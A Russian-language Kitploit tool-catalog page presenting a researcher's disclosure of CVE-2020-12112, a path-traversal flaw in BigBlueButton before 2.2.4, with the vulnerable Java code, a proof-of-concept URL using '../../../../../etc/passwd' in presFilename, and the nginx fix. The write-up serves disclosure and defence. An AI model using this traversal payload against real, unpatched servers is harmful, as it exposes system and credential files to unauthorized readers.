Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-12112 — Версии BigBlueButton ниже 2.2.4 имеют уязвимость LFI, которая позволяет получить доступ к конфиденциальным файлам. 🚨 | Kitploit
Инструменты/GitHubGitHub/tchenu/cve-2020-12112
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubtchenu/cve-2020-12112

CVE-2020-12112

Версии BigBlueButton ниже 2.2.4 имеют уязвимость LFI, которая позволяет получить доступ к конфиденциальным файлам. 🚨

Репозиторий
1413 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-12112 🚨

Версии BigBlueButton ниже 2.2.4 содержат уязвимость LFI, позволяющую получить доступ к конфиденциальным файлам.

История 📜

Во время курса дистанционного обучения на экземпляре BigBlueButton один из студентов моего курса поделился ссылкой на слайд-презентацию моего преподавателя, и я заметил, что имя файла было включено в URL.

Школьный Slack

root@kitploit:~
Student: "No need to write notes, I've got the slide."
Me: Well, I've got a security report to make. 😂

Немного поиграв с этим, я смог получить доступ к файлу /etc/passwd сервера и обнаружить наличие уязвимости безопасности в решении с открытым исходным кодом Big Blue Button.

Я сообщил об уязвимости, команда BBB быстро ответила мне и исправила уязвимость (всего за несколько дней).

Poc 🧙

root@kitploit:~
public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

Как вы можете видеть, этот метод, используемый в PresentationController, позволяет загружать файл презентации путём конкатенации 3 параметров.

  • Абсолютный путь файла
  • Символ-разделитель
  • Имя файла

Это позволяет получать такие ссылки:

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

Чтобы использовать уязвимость, достаточно получить валидную ссылку на файл презентации и изменить параметр presFilename для доступа к конфиденциальным файлам.

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

файл /etc/passwd

Патч 🤕

Команда BBB исправила уязвимость в версии 2.2.4 с помощью правила конфигурации сервера (HTTP), регулярного выражения и точного формата имени файла.

root@kitploit:~
		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

Ссылки 🔍

  • https://nvd.nist.gov/vuln/detail/CVE-2020-12112
  • https://github.com/bigbluebutton/bigbluebutton/blob/master/bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/PresentationController.groovy
  • https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c
  • https://twitter.com/thibeault_chenu/status/1249976515917422593
  • https://twitter.com/bigbluebutton/status/1252706369486180353
Скачать инструмент